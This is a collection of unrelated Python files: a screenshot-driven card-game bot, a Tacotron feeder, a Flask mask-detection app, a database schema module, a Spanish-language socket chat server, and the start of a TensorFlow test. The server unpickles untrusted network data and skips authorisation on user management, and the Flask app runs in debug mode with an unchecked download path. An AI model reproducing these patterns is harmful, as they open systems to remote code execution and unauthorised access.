haveWhite = LocateOnImage(imgCv, self.PicsCV["card_white"], region=(sx + 50 * i, sy, 60, 60), confidence=0.9)
if haveWhite is not None:
break
result = LocateOnImage(imgCv, self.PicsCV["card_upper_edge"], region=(sx + 50 * i, 720, sw, 50), confidence=0.9)
# result = pyautogui.locate(needleImage=self.Pics["card_upper_edge"], haystackImage=image,
# region=(sx + 50 * i, 720, sw, 50), confidence=0.9)
checkSelect = 0
if result is not None:
# result = pyautogui.locate(needleImage=self.Pics['card_overlap'], haystackImage=image,
# region=(sx + 50 * i, 750, sw, 50), confidence=0.85)
result = LocateOnImage(imgCv, self.PicsCV["card_overlap"], region=(sx + 50 * i, 750, sw, 50), confidence=0.85)
if result is None:
checkSelect = 1
select_map.append(checkSelect)
currCard = ""
ci = cardSearchFrom
while ci < len(AllCardsNC):
if "r" in AllCardsNC[ci] or "b" in AllCardsNC[ci]:
result = LocateOnImage(imgCv, self.PicsCV["m" + AllCardsNC[ci]], region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.91)
# result = pyautogui.locate(needleImage=self.Pics["m" + AllCardsNC[ci]], haystackImage=image,
# region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
if result is not None:
cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
cardSearchFrom = ci
currCard = AllCardsNC[ci][1]
cardInfo = (currCard, cardPos)
hand_cards.append(cardInfo)
else:
outerBreak = False
for card_type in ["r", "b"]:
result = LocateOnImage(imgCv, self.PicsCV["m" + card_type + AllCardsNC[ci]], region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.91)
# result = pyautogui.locate(needleImage=self.Pics["m" + card_type + AllCardsNC[ci]],
# haystackImage=image,
# region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
if result is not None:
cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
cardSearchFrom = ci
currCard = AllCardsNC[ci]
cardInfo = (currCard, cardPos)
hand_cards.append(cardInfo)
outerBreak = True
break
if outerBreak:
break
if ci == len(AllCardsNC) - 1 and checkSelect == 0:
checkSelect = 1
ci = cardSearchFrom - 1
ci += 1
QtWidgets.QApplication.processEvents(QEventLoop.AllEvents, 10)
print("GetCards Costs ", time.time()-st)
return hand_cards, select_map
def LeftClick(self, pos):
x, y = pos
x = (x / 1798) * self.RealRate[0]
y = (y / 1047) * self.RealRate[1]
x = int(x)
y = int(y)
lParam = win32api.MAKELONG(x, y)
win32gui.PostMessage(self.Handle, WM_MOUSEMOVE, MK_LBUTTON, lParam)
win32gui.PostMessage(self.Handle, WM_LBUTTONDOWN, MK_LBUTTON, lParam)
win32gui.PostMessage(self.Handle, WM_LBUTTONUP, MK_LBUTTON, lParam)
def SelectCards(self, cards):
cards = [card for card in cards]
tobeSelected = []
tobeSelected.extend(cards)
image, windowPos = self.Screenshot()
handCardsInfo, states = self.GetCards(image)
cardSelectMap = []
for card in handCardsInfo:
c = card[0]
if c in tobeSelected:
cardSelectMap.append(1)
tobeSelected.remove(c)
else:
cardSelectMap.append(0)
clickMap = []
handcards = [c[0] for c in handCardsInfo]
for i in range(0, len(cardSelectMap)):
if cardSelectMap[i] == states[i]:
clickMap.append(0)
else:
clickMap.append(1)
while 1 in clickMap:
for i in range(0, len(clickMap)):
if clickMap[i] == 1:
self.LeftClick(handCardsInfo[i][1])
break
time.sleep(0.1)
if self.Interrupt:
break
image, _ = self.Screenshot()
states = self.GetCardsState(image)
clickMap = []
for i in range(0, len(cardSelectMap)):
if cardSelectMap[i] == states[i]:
clickMap.append(0)
else:
clickMap.append(1)
QtWidgets.QApplication.processEvents(QEventLoop.AllEvents, 10)
|
feeder.py
|
import os
import threading
import time
import traceback
import numpy as np
import tensorflow as tf
from infolog import log
from sklearn.model_selection import train_test_split
from tacotron.utils.text import text_to_sequence
_batches_per_group = 32
class Feeder:
"""
    Feeds batches of data into the queue on a background thread.
"""
def __init__(self, coordinator, metadata_filename, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._cleaner_names = [x.strip() for x in hparams.cleaners.split(',')]
self._train_offset = 0
self._test_offset = 0
# Load metadata
self._mel_dir = os.path.join(os.path.dirname(metadata_filename), 'mels')
self._linear_dir = os.path.join(os.path.dirname(metadata_filename), 'linear')
with open(metadata_filename, encoding='utf-8') as f:
self._metadata = [line.strip().split('|') for line in f]
frame_shift_ms = hparams.hop_size / hparams.sample_rate
hours = sum([int(x[4]) for x in self._metadata]) * frame_shift_ms / (3600)
log('Loaded metadata for {} examples ({:.2f} hours)'.format(len(self._metadata), hours))
# Train test split
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches is not None
test_size = (hparams.tacotron_test_size if hparams.tacotron_test_size is not None
else hparams.tacotron_test_batches * hparams.tacotron_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.tacotron_data_random_state)
        # Make sure test_indices is a multiple of batch_size, else round down and move the extras back to the training set
len_test_indices = self._round_down(len(test_indices), hparams.tacotron_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.tacotron_batch_size
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches == self.test_steps
# pad input sequences with the <pad_token> 0 ( _ )
self._pad = 0
        # explicitly setting the padding to a value that doesn't originally exist in the spectrogram
        # to avoid any possible conflicts, without affecting the output range of the model too much
if hparams.symmetric_mels:
self._target_pad = -hparams.max_abs_value
else:
self._target_pad = 0.
# Mark finished sequences with 1s
self._token_pad = 1.
with tf.device('/cpu:0'):
# Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
self._placeholders = [
tf.placeholder(tf.int32, shape=(None, None), name='inputs'),
tf.placeholder(tf.int32, shape=(None, ), name='input_lengths'),
tf.placeholder(tf.float32, shape=(None, None, hparams.num_mels), name='mel_targets'),
tf.placeholder(tf.float32, shape=(None, None), name='token_targets'),
tf.placeholder(tf.float32, shape=(None, None, hparams.num_freq), name='linear_targets'),
tf.placeholder(tf.int32, shape=(None, ), name='targets_lengths'),
]
# Create queue for buffering data
queue = tf.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32], name='input_queue')
self._enqueue_op = queue.enqueue(self._placeholders)
self.inputs, self.input_lengths, self.mel_targets, self.token_targets, self.linear_targets, self.targets_lengths = queue.dequeue()
self.inputs.set_shape(self._placeholders[0].shape)
self.input_lengths.set_shape(self._placeholders[1].shape)
self.mel_targets.set_shape(self._placeholders[2].shape)
self.token_targets.set_shape(self._placeholders[3].shape)
self.linear_targets.set_shape(self._placeholders[4].shape)
self.targets_lengths.set_shape(self._placeholders[5].shape)
# Create eval queue for buffering eval data
eval_queue = tf.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32], name='eval_queue')
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, self.eval_token_targets, \
self.eval_linear_targets, self.eval_targets_lengths = eval_queue.dequeue()
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_input_lengths.set_shape(self._placeholders[1].shape)
self.eval_mel_targets.set_shape(self._placeholders[2].shape)
self.eval_token_targets.set_shape(self._placeholders[3].shape)
self.eval_linear_targets.set_shape(self._placeholders[4].shape)
self.eval_targets_lengths.set_shape(self._placeholders[5].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name='background', target=self._enqueue_next_train_group)
thread.daemon = True # Thread will close when parent quits
thread.start()
thread = threading.Thread(name='background', target=self._enqueue_next_test_group)
thread.daemon = True # Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
# Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
linear_target = np.load(os.path.join(self._linear_dir, meta[2]))
return (input_data, mel_target, token_target, linear_target, len(mel_target))
def make_test_batches(self):
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
# Test on entire test set
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i + n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
return batches, r
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i + n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
# Create test batches once and evaluate on them for all test steps
test_batches, r = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
"""Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
"""
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
# Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
linear_target = np.load(os.path.join(self._linear_dir, meta[2]))
return (input_data, mel_target, token_target, linear_target, len(mel_target))
def _prepare_batch(self, batch, outputs_per_step):
np.random.shuffle(batch)
inputs = self._prepare_inputs([x[0] for x in batch])
input_lengths = np.asarray([len(x[0]) for x in batch], dtype=np.int32)
mel_targets = self._prepare_targets([x[1] for x in batch], outputs_per_step)
        # Pad token targets with 1 to mark that the sequence is done
token_targets = self._prepare_token_targets([x[2] for x in batch], outputs_per_step)
linear_targets = self._prepare_targets([x[3] for x in batch], outputs_per_step)
targets_lengths = np.asarray([x[-1] for x in batch], dtype=np.int32) # Used to mask loss
return (inputs, input_lengths, mel_targets, token_targets, linear_targets, targets_lengths)
def _prepare_inputs(self, inputs):
max_len = max([len(x) for x in inputs])
return np.stack([self._pad_input(x, max_len) for x in inputs])
def _prepare_targets(self, targets, alignment):
max_len = max([len(t) for t in targets])
return np.stack([self._pad_target(t, self._round_up(max_len, alignment)) for t in targets])
def _prepare_token_targets(self, targets, alignment):
max_len = max([len(t) for t in targets]) + 1
return np.stack([self._pad_token_target(t, self._round_up(max_len, alignment)) for t in targets])
def _pad_input(self, x, length):
return np.pad(x, (0, length - x.shape[0]), mode='constant', constant_values=self._pad)
def _pad_target(self, t, length):
return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode='constant', constant_values=self._target_pad)
def _pad_token_target(self, t, length):
return np.pad(t, (0, length - t.shape[0]), mode='constant', constant_values=self._token_pad)
def _round_up(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _round_down(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x - remainder
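# Illustrative note (not part of the original feeder.py): a minimal, standalone sketch of
# the length-bucketing strategy used by _enqueue_next_train_group and make_test_batches
# above. Examples are sorted by their last element (the target length), chunked into
# batches of size n, and the batch order is shuffled, so each batch pads to a similar
# length while training still sees batches in random order. The name bucket_into_batches
# and the dummy data below are assumptions made for this sketch only.
import random
def bucket_into_batches(examples, n):
    # sort by target length so neighbouring examples need similar amounts of padding
    examples = sorted(examples, key=lambda x: x[-1])
    # split the sorted list into consecutive batches of (at most) n examples
    batches = [examples[i:i + n] for i in range(0, len(examples), n)]
    # shuffle the batch order so lengths do not increase monotonically during training
    random.shuffle(batches)
    return batches
# example usage (hypothetical data: (name, target_length) pairs):
#   bucket_into_batches([('a', 7), ('b', 3), ('c', 9), ('d', 1), ('e', 4), ('f', 8)], n=2)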
|
maskdetection.py
|
import os
import threading
import argparse
import filetype
from flask import Flask, Response, make_response, send_file
from flask import flash, request, redirect, jsonify
from flask import render_template
from models.realStream import RealStream
from models.facenet import FaceNet
from models.util import utils
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
TEMPLATES_AUTO_RELOAD = True
# initialize a flask object
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route("/")
def index():
# return the rendered template
return render_template("index.html")
@app.route("/realstream/")
def realStream():
# start a thread that will start a video stream
global t
# start a thread that will perform mask detection
rs = RealStream()
t = threading.Thread(target=rs.mask_detection)
t.daemon = True
t.start()
# forward to real stream page
return render_template("realStream.html")
@app.route("/staticstream/")
def staticstream():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to static stream page
return render_template("staticStream.html")
@app.route("/imageprocess/")
def imageprocess():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
return render_template("imageprocess.html")
@app.route("/folderscan/")
def folderscan():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to static stream page
return render_template("folderscan.html")
@app.route("/about/")
def about():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to about page
return render_template("about.html")
@app.route("/contact/")
def contact():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to contact page
return render_template("contact.html")
#---------------------------------------------------------------------
#----------------------------Functions--------------------------------
#---------------------------------------------------------------------
@app.route("/uploadfile", methods=['GET', 'POST'])
def uploadfile():
if request.method == 'POST':
# save file
file = request.files['uploadFile']
result = utils.save_file(file)
if result == 0:
print("file saved failed.")
else:
print("file saved successful.")
# call function to process it
rs = RealStream()
# check file type
filepath = utils.get_file_path('webApp/uploads', file.filename)
if filetype.is_image(filepath):
output = rs.processimage(file.filename)
elif filetype.is_video(filepath):
output = rs.processvideo(file.filename)
        else:
            print("delete it.")
            output = None  # unsupported file type: nothing was processed
# allow user to download after process it
return jsonify({'filename': output})
@app.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
rs = RealStream()
return Response(rs.generate, mimetype = "multipart/x-mixed-replace; boundary=frame")
@app.route("/download/<fileName>", methods=['GET'])
def download(fileName):
file = os.path.join(UPLOAD_FOLDER, fileName)
response = make_response(send_file(file))
response.headers["Content-Disposition"] = "attachment; filename={};".format(file)
return response
@app.route("/content_dash", methods=['GET'])
def content_dash():
data = request.values
if data['type'] == 'imagecode':
return render_template('imagecode.html')
if data['type'] == 'imageprocess':
return render_template('imageprocess.html')
if data['type'] == 'folderscan':
return render_template('folderscan.html')
@app.route('/uploadimage', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'uploadImage' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['uploadImage']
# save file first
utils.save_file(file)
# encoding and save into db
md = FaceNet()
username = request.form['username']
md.save_encode_db(username, file.filename)
return jsonify('success')
# execute function
if __name__ == '__main__':
# construct the argument parser and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--ip", type=str, default="127.0.0.1", help="ip address")
ap.add_argument("-o", "--port", type=int, default=8000, help="port number of the server")
args = vars(ap.parse_args())
# start the flask app
app.run(host=args["ip"], port=args["port"], debug=True, threaded=True, use_reloader=False)
|
schema.py
|
"""
Schemas
=======
Schemas defines the structure of the fields of your table. The schema handles
fields validations, and ensure index unicity. There are 5 main concepts around
the schemas:
**Indexes**
An index defines which key (or set of keys) should be unique within your table.
The schema will perform checks on those indexes whenever a row is being created
or updated.
Some examples:
1. If you have a user table, and need usernames and emails to be unique, you
will have then 2 indexes.
2. If you have a session token table with a user id and a token number, you can
have one index composed of two keys: user id (hash) and token number (range)
**Validators**
Validators are health checks on the provided data. For example: if you have a
field `age`, the field is most likely going to have a defined range (minimum
and maximum). If a value provided is not valid, the field validator throws an
exception, caught by the schema, and returned as part of the response (so if
more than one field is invalid, the user can be informed.)
**Extensions**
Extensions are only available for `fetch` and `fetch_one` method. They are
populating more fields on the returned object.
For instance: if you have a user table, and a profile table, you probably want
the user to be able to get the profile as part of the same response. So
`profile` can be an extension of user.
**Generated fields**
Generated fields are created after field validation. For instance: on a blog
post, you want to capture the number of words, it could be a generated field.
Those fields are saved into the database.
**Operations**
Field operations are used for two things: the first is to validate all the
possible value this operation contains (by using the field itself) and the
second is to write the correct query.
For example: ``fetch_one(dict(username=Equal('michael')))``, will convert the
key into ```username__eq``` in dynamodb.
**Some examples**
Create a basic schema::
user = models.Schema(table, **fields)
Create a schema that has generated fields::
user = models.Schema(table, **fields)
@user.generated('username')
    def add_username_to_history(model):
# do something.
return model
Create extensions::
user = models.Schema(collection, **fields)
@user.extension('messages')
def profile(obj):
# get the profile for the user.
return profile
"""
from collections import namedtuple
from copy import deepcopy
from threading import Thread
from oto import response
from oto import status
from sukimu import consts
from sukimu import exceptions
from sukimu import operations
from sukimu import utils
class Schema():
def __init__(self, table, *indexes, **fields):
"""Initialize the Schema.
Args:
table (string): Name of the table or string.
options (dict): All the schema options.
"""
self.table = table
self.indexes = indexes
self.fields = fields
self.fields_dependencies = utils.key_dict(fields, default=[])
self.extensions = dict()
# Register the schema with the table.
self.table.set_schema(self)
def validate(self, values, operation):
"""Validate the model.
Args:
values (dict): The values to validate.
operation (int): The different operations
(correspond to schema operations).
Return:
Response.
"""
data = dict()
errors = dict()
success = False
items = set(values.keys())
if operation is operations.READ and not values:
return response.Response()
if operation is operations.CREATE:
items = set(self.fields.keys())
for name in items:
field = self.fields.get(name)
if not field:
continue
try:
value = values.get(name)
if isinstance(value, operations.Base):
value = value.validate(field)
data[name] = value
continue
data[name] = field.validate(value)
except exceptions.FieldException as e:
errors[name] = e.args[0]
status = False
if errors:
return response.create_error_response(
consts.ERROR_CODE_VALIDATION, errors)
return response.Response(message=data)
def ensure_indexes(self, validation_response, current=None):
"""Ensure index unicity.
One particularity of an index: it should be unique. For example in
DynamoDb: an index has a hash and a range, combined, they represent the
key of that specific row – and thus should be unique.
If an index only has one key, that key on its own should also be
unique (e.g. user_id).
Args:
validation_response (Response): The validation response that
contains the validated fields.
current (dict): Operations such as update requires to check against
the found ancestor and the current row that needs to be
validated.
Return:
Response: The response
"""
if not validation_response:
return validation_response
data = validation_response.message
errors = {}
current = current or {}
for index in self.indexes:
# Some databases allow to have non unique indexes. In this case,
# we ignore this index for the check.
if not index.unique:
continue
keys = index.keys
query = dict()
for key in keys:
key_value = data.get(key, current.get(key))
if not key_value:
break
query.update({key: operations.Equal(key_value)})
if not query:
continue
ancestor = self.fetch_one(**query)
if ancestor:
if not current or dict(ancestor.message) != dict(current):
errors.update({
key: exceptions.FIELD_ALREADY_USED for key in keys})
if errors:
return response.create_error_response(
consts.ERROR_CODE_DUPLICATE_KEY, errors)
return response.Response()
def generated(self, **dependencies):
"""Register a generated field.
        Generated fields may have some dependencies: if a specific field has
        been updated, for instance, the generated field will also need to be
        updated; some generated fields need to be refreshed on every update.
Args:
dependencies (dict): The dependencies for this specific generated
field.
Return:
Response: the response with the generated value.
"""
return NotImplemented
def extension(self, name):
"""Register an extension.
Args:
name (string): Name of the extension.
"""
def wrapper(method):
self.extensions.update({name: method})
return method
return wrapper
def fetch(self, fields=None, limit=None, sort=None, index=None,
context=None, **query):
"""Query the table to find all the models that correspond to the query.
Args:
fields (list): the list of fields to return on each of the items.
limit (int): optional limit on how many items need to be fetched.
sort (int): if the results should be sorted, and if so, in which
order.
index (str): name of the index to use.
context (dict): additional context to provide (used by extensions)
query (dict): fields to query on.
Return:
Response: the data of the request.
"""
validation_response = self.validate(query, operation=operations.READ)
if not validation_response:
return validation_response
schema_response = self.table.fetch(
query, sort=sort, limit=limit, index=index)
if schema_response and fields:
self.decorate_response(schema_response, fields, context=context)
return schema_response
def fetch_one(self, fields=None, context=None, **query):
"""Fetch one specific item.
Args:
fields (list): the list of fields to return on the item.
query (dict): the request fields to search on.
context (dict): optional context (used by extensions).
Return:
Response: the data from the request.
"""
validation_response = self.validate(query, operation=operations.READ)
if not validation_response:
return validation_response
schema_response = self.table.fetch_one(**query)
if schema_response and fields:
self.decorate_response(schema_response, fields, context=context)
return schema_response
def decorate_response(self, response, fields, context=None):
"""Decorate a response.
Args:
item (dict): The current item.
fields (dict): The fields that are need to be provided to the main
item.
context (dict): Additional context to provide to each extension.
Return:
Response: the decorated response.
"""
        if isinstance(fields, (list, tuple, set)):
            fields = utils.dict_from_strings(fields)
data = response.message
if isinstance(data, list):
data = [
self.decorate(dict(item), fields, context) for item in data]
else:
data = self.decorate(dict(data), fields, context)
response.message = data
def decorate(self, item, fields, context=None):
"""Decorate an item with more fields.
Decoration means that some fields are going to be added to the initial
item (using the extension with the same name.) The fields that are
expected from this extension are also being passed.
        Fields also trim the response object (unless left unspecified.) For
        instance, if you fetch one `user` with the fields `user.id`, only the
        id will be returned.
        Args:
            item (dict): The current item.
            fields (dict): The fields that need to be provided on the main
                item.
context (dict): Additional context to provide to each extension.
Return:
Response: the decorated response.
"""
def activate_extension(field, item, context=None):
extension = self.extensions.get(field)
if not extension:
return
kwargs = {}
if 'context' in extension.__code__.co_varnames:
kwargs.update(context=context)
item.update({field: extension(item, fields.get(field), **kwargs)})
table_fields = fields.pop(self.table.name, -1)
threads = []
for field in fields:
thread = Thread(
target=activate_extension, args=(field, item, context))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if table_fields == -1:
return item
keys = list(item.keys())
for key in keys:
if key not in table_fields:
item.pop(key)
        return item
def create(self, **data):
"""Create a model from the data passed.
"""
validation = self.validate(data, operation=operations.CREATE)
if not validation:
return validation
check = self.ensure_indexes(validation)
if not check:
return check
data = self.table.create(validation.message)
return response.Response(message=data)
def update(self, source, **data):
"""Update the model from the data passed.
"""
if not source:
return response.create_error_response(
message='The source cannot be empty.')
data = utils.key_exclude(data, source.keys())
data = self.validate(data, operation=operations.READ)
if not data:
return data
# Recreate the object - check ancestors.
current = self.fetch_one(**{
key: operations.Equal(val) for key, val in source.items()})
if not current:
return current
fields = response.Response(
message=dict(list(source.items()) + list(data.message.items())))
ancestors = self.ensure_indexes(fields, current.message)
if not ancestors:
return ancestors
return self.table.update(current, fields.message)
def delete(self, **source):
"""Delete the model(s) from the data passed.
"""
item = self.fetch_one(**source)
if not item:
return item
return self.table.delete(item.message)
def extends(self, **fields):
"""Extending a Schema.
Extension of a schema allows to add new fields. If you have a table
with users, some users might require different fields (for instance,
if the user has a gaming console, you might want to get more details
about this gaming console.)
"""
fields = utils.dict_merge(self.fields, fields)
table = self.table.copy()
indexes = deepcopy(self.indexes)
return Schema(table, *indexes, **fields)
class Table():
def __init__(self, name):
self.name = name
self.indexes = {}
def set_schema(self, schema):
self.schema = schema
for index in self.schema.indexes:
self.add_index(index)
def add_index(self, index):
return NotImplemented
def find_index(self, fields):
for index in self.indexes.values():
if len(fields) == 2:
is_hash = index.hash in (fields[0], fields[1])
is_range = index.range in (fields[0], fields[1])
if is_hash and is_range:
return index
if len(fields) == 1 and index.hash == fields[0]:
return index
def create(self, data):
return NotImplemented
def delete(self, source):
return NotImplemented
def update(self, source, data):
return NotImplemented
def fetch(self, query, sort=None, limit=None):
return NotImplemented
def fetch_one(self, **query):
return NotImplemented
def create_table(self):
return NotImplemented
def copy(self):
return NotImplemented
class Index():
PRIMARY = 1
LOCAL = 2
GLOBAL = 3
def __init__(self, *keys, name=None, unique=True):
self.name = name
self.keys = list(keys)
self.unique = unique
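# Illustrative note (not part of the original module): a hedged usage sketch tying the
# pieces above together -- a Schema built on a concrete Table backend with a unique
# Index, field validators, an extension, and an Equal operation in a query. The names
# InMemoryTable, UsernameField, AgeField and load_profile_for are hypothetical stand-ins
# invented for this sketch; the real project supplies its own table backends and field
# classes, so the lines below are kept as comments rather than executable code.
# user = Schema(
#     InMemoryTable('users'),                  # hypothetical concrete Table subclass
#     Index('username', unique=True),          # usernames must be unique across rows
#     username=UsernameField(),                # hypothetical field validators
#     age=AgeField())
# @user.extension('profile')
# def profile(item, fields, context=None):
#     # runs on fetch/fetch_one when 'profile' is listed in `fields`
#     return load_profile_for(item['username'])  # load_profile_for is hypothetical
# creation validates the fields, then ensure_indexes checks username unicity:
# user.create(username='michael', age=30)
# operations wrap query values, e.g. Equal becomes username__eq on a DynamoDB table:
# user.fetch_one(username=operations.Equal('michael'), fields=['profile'])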
|
server.py
|
from socket import *
from threading import *
import pickle
import DB
clientes = {}
direcciones = {}
clientes_on = []
DB.CREATE_DB()
DB.CREATE_TABLES()
def configuracion():
global servidor, mensaje
servidor = socket()
servidor.bind(("", 9999))
servidor.listen(10)
print("Esperando conexiones...")
aceptar_hilo = Thread(target=aceptar_conexiones)
aceptar_hilo.start()
aceptar_hilo.join()
def aceptar_conexiones():
while True:
global direccion_cliente
cliente_local, direccion_cliente = servidor.accept()
print("%s:%s conectado. "% direccion_cliente)
direcciones[cliente_local] = direccion_cliente
Thread(target=encargarse_cliente,args=(cliente_local,)).start()
def encargarse_cliente(cliente):
global mensaje
while True:
opcion = cliente.recv(1024).decode("utf-8")
#================================LOGIN
if opcion == 'login':
print("login")
user_info = cliente.recv(1024)
user_info = pickle.loads(user_info)
result = DB.SEARCH_USER_LOGIN(user_info[0], user_info[1])
if result is None:
cliente.send(bytes("error", "utf-8"))
DB.ADD_LOG(user_info[0],"Intento Fallido", "%s:%s"% direccion_cliente)
else:
cliente.send(bytes("exito", "utf-8"))
DB.ADD_LOG(user_info[0],"Intento Exitoso", "%s:%s"% direccion_cliente)
                # send the username and access level
user_logged = [result[0], result[1], result[2], result[3], result[4]]
result = [result[1], result[4], result[2]]
data_string = pickle.dumps(result)
cliente.send(data_string)
clientes[cliente] = user_logged[1]
clientes_on.append(user_logged[1])
if opcion == 'editar':
print("editar")
user_edit = cliente.recv(1024)
user_edit = pickle.loads(user_edit)
if user_edit[2] == '':
DB.UPDATE_CUENTA(user_logged[0], user_edit[0], user_edit[1], user_logged[3])
else:
DB.UPDATE_CUENTA(user_logged[0], user_edit[0], user_edit[1], user_edit[2])
user_logged[2] = user_edit[1]
user_logged[1] = user_edit[0]
        #================================USERS
if opcion == "listar_usuarios":
print("listar usuarios")
result = DB.SELECT_USERS()
data_string = pickle.dumps(result)
cliente.send(data_string)
if opcion == "buscar_usuarios":
print("buscar usuarios")
filtro = cliente.recv(1024).decode("utf-8")
result = DB.SELECT_USERS_FILTER(filtro)
data_string = pickle.dumps(result)
cliente.send(data_string)
if opcion == "eliminar_usuario":
print("eliminar usuario")
user_code = cliente.recv(1024).decode("utf-8")
DB.DELETE_USER(user_code)
if opcion == "crear_usuario":
print("crear usuario")
user_new = cliente.recv(1024)
user_new = pickle.loads(user_new)
print(user_new)
DB.CREATE_USER(user_new[0], user_new[1], user_new[2], user_new[3])
if opcion == 'editar_usuario':
print("editar usuario")
user_edit = cliente.recv(1024)
user_edit = pickle.loads(user_edit)
DB.UPDATE_USER(user_edit[0], user_edit[1], user_edit[2])
#================================HOME
if opcion == "listar_usuarios_online":
print("listar usuarios online")
print(clientes_on)
data_string = pickle.dumps(clientes_on)
cliente.send(data_string)
        #=================================MESSAGES
if __name__ == "__main__":
configuracion()
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
